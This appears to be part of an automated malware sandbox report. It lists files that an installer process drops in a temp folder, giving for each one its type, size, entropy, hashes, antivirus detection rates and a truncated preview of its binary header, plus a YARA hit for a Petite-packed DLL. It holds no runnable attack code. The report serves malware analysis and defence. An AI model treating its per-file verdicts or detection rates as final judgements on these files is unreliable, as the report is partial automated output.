                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 text
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.1208137218866945
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                          Malicious:false
                                                                                          Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16910
                                                                                          Entropy (8bit):5.289608933932413
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.192037544202194
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                          MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                          SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                          SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                          SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197646
                                                                                          Entropy (8bit):6.1570532273946625
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                          MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                          SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                          SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                          SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):31936
                                                                                          Entropy (8bit):6.6461204214578
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                          MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                          SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                          SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                          SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197120
                                                                                          Entropy (8bit):6.423554884287906
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):115712
                                                                                          Entropy (8bit):6.401537154757194
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):62478
                                                                                          Entropy (8bit):6.063363187934607
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):26126
                                                                                          Entropy (8bit):6.048294343792499
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8456
                                                                                          Entropy (8bit):6.767152008521429
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                          MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                          SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                          SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                          SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):337408
                                                                                          Entropy (8bit):6.515131904432587
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                          MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                          SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                          SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                          SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68042
                                                                                          Entropy (8bit):6.090396152400884
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                          MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                          SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                          SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                          SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):17472
                                                                                          Entropy (8bit):7.524548435291935
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                          MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                          SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                          SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                          SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):772608
                                                                                          Entropy (8bit):6.546391052615969
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                          MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                          SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                          SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                          SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197120
                                                                                          Entropy (8bit):6.423554884287906
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):19008
                                                                                          Entropy (8bit):7.672481244971812
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                          MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                          SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                          SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                          SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):227328
                                                                                          Entropy (8bit):6.641153481093122
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):26126
                                                                                          Entropy (8bit):6.048294343792499
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16910
                                                                                          Entropy (8bit):5.289608933932413
                                                                                          Encrypted:false
